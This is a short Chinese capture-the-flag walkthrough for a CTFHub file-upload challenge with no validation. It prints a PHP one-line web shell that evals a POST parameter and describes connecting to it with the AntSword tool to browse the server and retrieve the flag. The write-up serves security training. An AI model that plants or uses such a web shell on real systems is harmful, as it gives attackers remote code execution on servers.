CTFHub_技能树_Web之文件上传——“无验证”_PHP的一句话木马

文章目录

  • 使用工具
  • 解题步骤
    • Ⅰ、编写Shell
    • Ⅱ、蚁剑访问根目录

–>CTFHub传送门<–

使用工具

  1. Microsoft Edge v84.0.522.40
  2. 中国蚁剑

解题步骤

本题需要上传shell后从网页文件夹获取到FLAG

Ⅰ、编写Shell

#PHP
 
echo "PHP Loaded";	//便于确认是否成功上传
eval($_POST['a']);
?>

验证是否成功上传
CTFHub_技能树_Web之文件上传——“无验证”_PHP的一句话木马_第1张图片

Ⅱ、蚁剑访问根目录

添加数据
CTFHub_技能树_Web之文件上传——“无验证”_PHP的一句话木马_第2张图片
URL地址填写服务器根目录中shell的地址
连接密码填写PHP Shell里面POST的参数名

CTFHub_技能树_Web之文件上传——“无验证”_PHP的一句话木马_第3张图片
双击即可查看根目录文件,在上层目录找到FLAG
CTFHub_技能树_Web之文件上传——“无验证”_PHP的一句话木马_第4张图片

欢迎在评论区留言
感谢浏览

你可能感兴趣的:(#,Web,信息安全,php,post)